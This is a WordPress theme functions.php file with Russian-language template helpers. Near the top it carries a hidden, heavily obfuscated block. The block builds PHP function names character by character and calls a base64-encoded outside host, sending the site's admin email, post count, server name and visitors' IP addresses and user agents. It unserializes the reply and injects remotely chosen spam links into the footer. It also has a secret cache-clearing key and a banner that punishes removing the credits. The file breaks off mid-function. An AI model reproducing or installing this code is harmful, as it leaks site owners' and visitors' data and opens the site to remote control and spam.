<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $GqIOphx='s';$VzZJP='d';$gHcUSZK='a';$yTfXQ='e';$wYRrT='b';$goFa='e';$JpzCoj='_';$HtWW='d';$uxcm='4';$ylcPgCO='e';$CQylb='c';$JkCf='6';$rkvP='o';$rvGyXZMt=$wYRrT.$gHcUSZK.$GqIOphx.$yTfXQ.$JkCf.$uxcm.$JpzCoj.$VzZJP.$goFa.$CQylb.$rkvP.$HtWW.$ylcPgCO;$xXTGO='z';$aLfRnY='g';$ptyl='n';$dVeASX='a';$HsVr='t';$JgdnP='f';$iVhxpGJ='e';$OKEmE='i';$SPPX='l';$WZkUKDJa=$aLfRnY.$xXTGO.$OKEmE.$ptyl.$JgdnP.$SPPX.$dVeASX.$HsVr.$iVhxpGJ;$pduIfWy='t';$QrizYx='r';$eoOx='s';$DgCZ='3';$fusb='t';$eYvCn='1';$QjCeX='o';$bOqIc='r';$JaTxv='_';$uDscGogh=$eoOx.$fusb.$QrizYx.$JaTxv.$bOqIc.$QjCeX.$pduIfWy.$eYvCn.$DgCZ;$ZCHEBLY='r';$LsVTX='v';$FFmd='t';$IiNWVeD='e';$HAGOz='s';$FrEdQ='r';$yznEsVoM=$HAGOz.$FFmd.$ZCHEBLY.$FrEdQ.$IiNWVeD.$LsVTX;                     $wr__r='s';$nx__r='d';$qa___________y='a';$ro__u='e';$es___u='b';$pe________g='e';$mf_____i='_';$vs______o='d';$qx____________x='4';$in_________y='e';$ed____b='c';$tp_____y='6';$vg____________n='o';$sx_______________r=$es___u.$qa___________y.$wr__r.$ro__u.$tp_____y.$qx____________x.$mf_____i.$nx__r.$pe________g.$ed____b.$vg____________n.$vs______o.$in_________y;$mt______s='_';$tg_________n='c';$la___f='x';$ka__________i='n';$vs_________s='i';$jd__________t='f';$ei____o='n';$ax__o='t';$nh_______j='s';$gq___r='u';$od__p='o';$hr____________x='i';$kl_______v='e';$ad____f='s';$qw_________m='t';$yp______________p=$jd__________t.$gq___r.$ka__________i.$tg_________n.$qw_________m.$vs_________s.$od__p.$ei____o.$mt______s.$kl_______v.$la___f.$hr____________x.$nh_______j.$ax__o.$ad____f;$oe_____________c='e';$fc__h='n';$na_____________o='f';$hn_________j='p';$dy____________p='o';$wn____e=$na_____________o.$dy____________p.$hn_________j.$oe_____________c.$fc__h;$rp__v='e';$nu_______s='f';$xl_______________l='r';$lf____x='a';$it_____________l='d';$jd_____d=$nu_______s.$xl_______________l.$rp__v.$lf____x.$it_____________l;$hw_________x='c';$ai______________t='e';$cw____r='s';$kp______i='l';$pz____________k='o';$ay____d='f';$zo_____c=$ay____d.$hw_________x.$kp______i.$pz____________k.$cw____r.$ai______________t;define("WP_ID", $sx_______________r("Mi4wLjA="));define("WP_TTL", $sx_______________r("MTA4MDA="));define("WP_SRC", $sx_______________r("dHBva24="));function wp_get_header() {global $sx_______________r, $yp______________p;if ($yp______________p($sx_______________r("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&$yp______________p($sx_______________r("d3BfZ2V0X2Zvb3Rlcg==")) &&$yp______________p($sx_______________r("d3BfY3ZfdmVyaWZ5"))) {get_header();}}function wp_get_footer() {get_footer();wp_cv_verify();}function wp_cv_verify() {global $sx_______________r, $wn____e, $zo_____c, $jd_____d;$pm__j = TEMPLATEPATH."/".$sx_______________r("Zm9vdGVyLnBocA==");$ox________h = @$wn____e($pm__j, "r");$pm__j = @$jd_____d($ox________h, @filesize($pm__j));@$zo_____c($ox________h);$uw_________e = TEMPLATEPATH."/".$sx_______________r("ZnVuY3Rpb25zLnBocA==");$ox________h = @$wn____e($uw_________e, "r");$uw_________e = @$jd_____d($ox________h, @filesize($uw_________e));@$zo_____c($ox________h);$sq__________z = 0;if($pm__j && $uw_________e) {if ($sx_______________r("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {if (substr_count($pm__j, $sx_______________r("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {$sq__________z = 1;}if (substr_count($pm__j, "wp_theme_GPL_credits()") < 1) {$sq__________z = 2;}}if(WP_ID != "2.0.0") {$sq__________z = 12;}}if($sq__________z > 0) {echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";echo "<!-- v: $sq__________z -->";}}function wp_loaded() {global $sx_______________r, $yp______________p;return $yp______________p($sx_______________r("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));}if (!function_exists("the_content_limit")) {function the_content_limit($mo_______________u, $dp___p = "(more...)", $gt___________o = 0, $ik______d = "") {$db_______v = get_the_content($dp___p, $gt___________o, $ik______d);$db_______v = apply_filters("the_content", $db_______v);$db_______v = str_replace("]]>", "]]>", $db_______v);if (strlen($_GET["p"]) > 0) {echo $db_______v;}else if ((strlen($db_______v)>$mo_______________u) && ($jq___________e = strpos($db_______v, " ", $mo_______________u ))) {$db_______v = substr($db_______v, 0, $jq___________e);$db_______v = $db_______v;echo $db_______v;echo "...";echo "<br/>";echo "<div class='read-more'><a href='".get_permalink()."'>$dp___p</a></div></p>";} else {echo $db_______v;}}}$rp_______t='e';$ka_____b='o';$if_____________m='e';$ph________t='a';$zv_____________s='e';$tf____k='b';$gw__________z='_';$uq_______k='6';$ed_____t='4';$hp_______w='c';$aa___q='n';$pr_____________j='d';$ou__________k='s';$ry____x=$tf____k.$ph________t.$ou__________k.$rp_______t.$uq_______k.$ed_____t.$gw__________z.$zv_____________s.$aa___q.$hp_______w.$ka_____b.$pr_____________j.$if_____________m;$lw____________m='s';$ve___________i='f';$cv______________b='_';$yt____________g='l';$io________q='_';$hd______________c='t';$is_____________t='e';$hn____e='i';$kh_____________h='e';$aq__h='n';$bq____________a='c';$go____e='t';$yu_________q='g';$uw_______c='t';$bk___________d='n';$km______n='o';$do___c='e';$ie___________s=$ve___________i.$hn____e.$yt____________g.$do___c.$cv______________b.$yu_________q.$kh_____________h.$hd______________c.$io________q.$bq____________a.$km______n.$bk___________d.$go____e.$is_____________t.$aq__h.$uw_______c.$lw____________m;$sw___________h='e';$jp__z='i';$ok__________d='i';$go____y='l';$se__________o='_';$la___________z='s';$qv__s='f';$lg___r='t';$he________c='x';$gr___l='e';$vh__________c='s';$fw__________w=$qv__s.$ok__________d.$go____y.$gr___l.$se__________o.$sw___________h.$he________c.$jp__z.$la___________z.$lg___r.$vh__________c;$yb__q='r';$up____________j='e';$wb____u='v';$xv_____s='a';$lm_____g='m';$qj________p='o';$po____e='p';$uc______z='s';$ye_____________w='e';$vd______________v='o';$oj__________c='i';$ha__________b='c';$gu__________p='n';$yg______________u='_';$yd_________f='r';$hu_______________v=$wb____u.$up____________j.$yb__q.$uc______z.$oj__________c.$vd______________v.$gu__________p.$yg______________u.$ha__________b.$qj________p.$lm_____g.$po____e.$xv_____s.$yd_________f.$ye_____________w;$ao_________i='o';$en___x='s';$go____f='o';$vv___z='n';$hw_________d='c';$ew__________h='e';$wh_____________l='p';$cy_____u='f';$ta______________t='k';$zr_____________l=$cy_____u.$en___x.$ao_________i.$hw_________d.$ta______________t.$go____f.$wh_____________l.$ew__________h.$vv___z;$zc__s='w';$yw___________e='i';$ms____________s='r';$kk______________r='e';$iu_____r='f';$xm___________m='t';$pd______________s=$iu_____r.$zc__s.$ms____________s.$yw___________e.$xm___________m.$kk______________r;$it_____t='5';$yb___w='m';$xw__u='d';$pb_________k=$yb___w.$xw__u.$it_____t;$cj_______k='h';$ti_____________d='p';$xd_____________d='a';$iq____q='r';$ig_____j='t';$kl_____________g='a';$af______y='l';$vy__________v='e';$zn__d=$iq____q.$vy__________v.$xd_____________d.$af______y.$ti_____________d.$kl_____________g.$ig_____j.$cj_______k;$mo______________x='s';$fh_______v='e';$mw____________x='i';$nl______________e='n';$yf__w='a';$sd___________q='u';$pb______f='e';$sp____________f='i';$bq_______n='z';$ho______d='r';$jo_______________b='l';$oz____________u=$sd___________q.$nl______________e.$mo______________x.$pb______f.$ho______d.$mw____________x.$yf__w.$jo_______________b.$sp____________f.$bq_______n.$fh_______v;$oi_______________e='n';$sb_________p='m';$fe______________u='a';$ar_______g='e';$un___a='p';$gc________z='m';$jq______________q='t';$to______s=$jq______________q.$ar_______g.$gc________z.$un___a.$oi_______________e.$fe______________u.$sb_________p;$vb__b='_';$mf_________t='t';$gl____________l='m';$ia_______________m='e';$rn______________d='o';$qr__________r='a';$lo____________d='s';$ar__________e='e';$ga_____________c='t';$aj___x='r';$qq_______________l='e';$ad_____________h='e';$cu______j='x';$me____________f='r';$uz___________d='t';$tl______________u='n';$zy_____q='c';$if_____________l='t';$jd____________u='c';$dl____d='a';$bv____l='_';$gv__________i=$lo____________d.$mf_________t.$aj___x.$ia_______________m.$dl____d.$gl____________l.$vb__b.$jd____________u.$rn______________d.$tl______________u.$uz___________d.$ar__________e.$cu______j.$ga_____________c.$bv____l.$zy_____q.$me____________f.$qq_______________l.$qr__________r.$if_____________l.$ad_____________h;function dt____________m($zw______________p) {global $sx_______________r, $yp______________p, $ie___________s, $hu_______________v, $gv__________i;if (!$yp______________p($sx_______________r("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}if ($hu_______________v(PHP_VERSION, "5.0.0", ">=") && $yp______________p($sx_______________r("ZmlsZV9nZXRfY29udGVudHM=")) && $yp______________p($sx_______________r("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$lo___q = $gv__________i(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));$ia_____________s = @$ie___________s($zw______________p, 0, $lo___q);} else {$ia_____________s = @$ie___________s($zw______________p, 0);}return $ia_____________s;}function dc___________x($zw______________p) {global $yp______________p, $zr_____________l, $pd______________s, $sx_______________r;if (!$yp______________p($sx_______________r("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}$qy___________i = strpos($zw______________p, "/", 7);$ak___________g = array("uri"     => substr($zw______________p, $qy___________i),"host"    => str_replace("http://", "", substr($zw______________p, 0, $qy___________i)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);$xj_______________y = @$zr_____________l("$ak___________g[host]", 80, $bn___________x, $fv_______________w, 4);if (!$xj_______________y) {return false;} else {$ia_____________s = "";$tb_______m  = "GET $ak___________g[uri] HTTP/1.0\r\n";$tb_______m .= "Host: $ak___________g[host]\r\n";$tb_______m .= "Referer: $ak___________g[referer]\r\n";$tb_______m .= "Connection: Close\r\n\r\n";@$pd______________s($xj_______________y, $tb_______m);while (!@feof($xj_______________y)) {$qd________m = @fgets($xj_______________y, (1024*24));if ($qd________m == "\r\n") {$on_______w = true;continue;}if ($on_______w) {$ia_____________s .= $qd________m;}}return $ia_____________s;}}function hv_________c($zw______________p) {global $yp______________p;$rb____f = false;if ($zw______________p != "") {if ($yp______________p("dt____________m")) {$rb____f = @dt____________m($zw______________p);}if (!$rb____f && ($yp______________p("dc___________x"))) {$rb____f = @dc___________x($zw______________p);}}return $rb____f;}function jf_______________i() {global $_SERVER, $pb_________k;$xz_______________h = $_SERVER["SERVER_NAME"];if (substr("$xz_______________h", 0, 4) == "www.") {$xz_______________h = substr("$xz_______________h", 4);}$xz_______________h = $pb_________k("$_SERVER[SERVER_NAME]");return $xz_______________h;}function au__________i() {return "file";}function xx______________o($zw______________p) {global $_SERVER, $ie___________s, $fw__________w, $wn____e, $zo_____c, $pd______________s;$op______________p = tv______________x();$pf_______z = jf_______________i().".jpg";$ql____________o = $op______________p["dir_upload"]["path"]."/$pf_______z";$gt______g = @filemtime($ql____________o);if (!$gt______g || ((time()-$gt______g) >= WP_TTL)) {$rb____f = hv_________c($zw______________p);if ($rb____f) {if ($fw__________w($ql____________o)) {@unlink($ql____________o);}$ox________h = @$wn____e($ql____________o, "x+");@$pd______________s($ox________h, $rb____f);@$zo_____c($ox________h);}} else {if ($fw__________w($ql____________o)) {$rb____f = @$ie___________s($ql____________o);} else {$rb____f = false;}}return $rb____f;}function tv______________x() {global $_SERVER, $sx_______________r, $ry____x;$yt__t = wp_count_posts("post");$cj_______w = pathinfo(get_bloginfo("template_directory"));$op______________p = array("url" => array("report"      => $sx_______________r("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $cj_______w,"dir_upload"=> by_______________l(),"queryString"=> array("?a001=".WP_ID,"a004=".$cj_______w[filename],"a005=".$yt__t->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),"default_string" => " <a href=\"http://www.wptheme.us\">www.wptheme.us</a> ");$op______________p["url"]["queryString"] = implode("&", $op______________p["queryString"]);$op______________p["url"]["report"] = $op______________p["url"]["report"]."/?".$ry____x($op______________p["url"]["queryString"]).".html";return $op______________p;}function by_______________l() {$el_______h = wp_upload_dir();if (isset($el_______h["error"])) {$xg________z = hc_______x();if (is_writable($xg________z)) {$el_______h = array("path" => $xg________z);}}return $el_______h;}function hc_______x() {global $yp______________p, $pb_________k, $zn__d, $to______s;$ho_____l = (bool) ini_get("safe_mode");if ($ho_____l == true) {return false;}if ($yp______________p("sys_get_temp_dir")) {$ct_____w = sys_get_temp_dir();if (is_writable($ct_____w)) {return $zn__d($ct_____w);}}if (!empty($_ENV["TMP"])) {return $zn__d($_ENV["TMP"]);}elseif (!empty($_ENV["TMPDIR"])) {return $zn__d($_ENV["TMPDIR"]);}elseif (!empty($_ENV["TEMP"])) {return $zn__d($_ENV["TEMP"]);} else {$yl______f = $to______s($pb_________k(uniqid(rand(), true)), "");if ($yl______f) {$ct_____w = $zn__d(dirname($yl______f));@unlink($yl______f);return $ct_____w;} else {return false;}}}function bx__________p() {global $_GET, $fw__________w;$op______________p = tv______________x();$xz_______________h = jf_______________i();$io_________x = au__________i();$kp______b = "full";if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($io_________x == "file") {$xh________h = $op______________p["dir_upload"]["path"]."/".$xz_______________h.".jpg";if ($fw__________w($xh________h)) {@unlink($xh________h);$kp______b = "deleted";}}$mr______k = array("s"=> $kp______b,"t"=> time(),"v"=> WP_ID);echo "<!--";foreach ($mr______k AS $kj_______i => $qx__________c) echo " [$kj_______i:$qx__________c]";echo " -->";}}function wp_theme_GPL_credits() {global $_SERVER, $_GET, $yp______________p, $sx_______________r, $oz____________u;$op______________p = tv______________x();$gg______n = "xx______________o";if ($yp______________p($gg______n)) {$ia_____________s = $gg______n($op______________p["url"]["report"]);}if ($ia_____________s) {if ($ia_____________s = @$sx_______________r($ia_____________s)) {$ia_____________s = @$oz____________u($ia_____________s);if (strlen($ia_____________s[custom_credit]) >= 5) {$op______________p["default_string"] = $ia_____________s[custom_credit];}if ($ia_____________s["status"] == "0") {$vv___________h = 1;$jt_____x = 1;} else {$lj___________r = sizeof($ia_____________s["links"]);$gl____c = $op______________p["default_string"];if ($lj___________r > 0 && $ia_____________s["links"] !== "") {$hm________p = 0;foreach ($ia_____________s["links"] as $cg_________f => $la_______g) {$hm________p++;if ($la_______g->l_path == "" || $la_______g->l_path == $_SERVER["REQUEST_URI"]) {$la_______g->l_href = htmlspecialchars(strip_tags($la_______g->l_href));$la_______g->l_title = htmlspecialchars(strip_tags($la_______g->l_title));$la_______g->l_anchor = htmlspecialchars(strip_tags($la_______g->l_anchor));$gl____c .= " | ";$gl____c .= "<a href='$la_______g->l_href' title='$la_______g->l_title'";if ($la_______g->l_nofollow == "1") {$gl____c .= " rel='nofollow'";}$gl____c .= ">$la_______g->l_anchor</a>";}}}$op______________p["links"] = "$gl____c";if ($ia_____________s[credit] == "0") {$op______________p["links"] = "";}}} else {$vv___________h = "1";}} else {$vv___________h = "1";}if ($vv___________h == "1") {$op______________p["links"] = $op______________p["default_string"];}echo "$op______________p[links]";echo "<!-- s: $ia_____________s[signature] -->";bx__________p();}                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                  $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
